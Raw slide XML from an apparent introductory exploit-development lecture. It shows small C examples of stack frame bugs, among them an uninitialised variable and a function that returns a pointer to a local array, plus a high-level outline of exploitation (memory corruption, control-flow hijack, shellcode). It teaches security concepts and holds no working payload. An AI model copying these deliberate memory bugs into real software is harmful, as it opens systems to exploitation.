              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRP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void do_nothing() {}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRP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int foo(int j) {</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for (i=0; i&lt;j; i++) </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do_nothing();</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return j;</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a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRP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void ineedj(void) {</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printf ("j is %d \n", j);</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a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRP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main() {</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int j;</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j = foo(i);</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  ineedj();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>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y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="681" name="Shape 68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stack frame problem</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="682" name="Shape 682"/>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Clr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="61111"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>char *initialize() {</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>  char string[80];</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>  char* ptr = string;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>  return ptr;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>}</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>main() {</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>  char *myval = initialize();</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>  do_something_with(myval);</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>}</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="61111"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Commentary: Since string is a local variable, its space is lost after returning from initialize. This space will be reused by the next function to be called. Eventual disaster!</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Exploitation </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="128" name="Shape 128"/>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342900" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" lang="en"/>
              <a:t>Most of security is putting bandages on problems caused by old problems or design choices</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-419100" marL="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" lang="en"/>
              <a:t>following</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="3000" lang="en"/>
            </a:br>
            <a:r>
              <a:rPr sz="3000" lang="en"/>
              <a:t>checklists...</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="129" name="Shape 129"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off y="2963487" x="3898899"/>
            <a:ext cy="3581400" cx="4787900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="130" name="Shape 130"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4824425" x="961475"/>
            <a:ext cy="1020899" cx="2935500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="91425" rIns="91425" lIns="91425" tIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" i="1"/>
              <a:t>Sometimes, its like patching up an old plane with duct tape!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
              <a:t>Exploitation Theory</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="136" name="Shape 136"/>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a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>General Exploitation Theory:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Due to the inability to distinguish between instructions and data in Von Neumann architecture machines, we can corrupt data with instructions and hijack control flow.  This is also because data contains control flow data that is used to direct the execution of the instructions by the processor.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Most exploits can be generalized into a three step process</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="-342900" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Some sort of memory corruption</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="-342900" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Change / hijacking of control flow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="-342900" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Execution of the shellcode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>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
              <a:t>Exploit Development 101</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="142" name="Shape 142"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3600451" x="685800"/>
            <a:ext cy="900599" cx="6400799"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="91425" rIns="91425" lIns="91425" tIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>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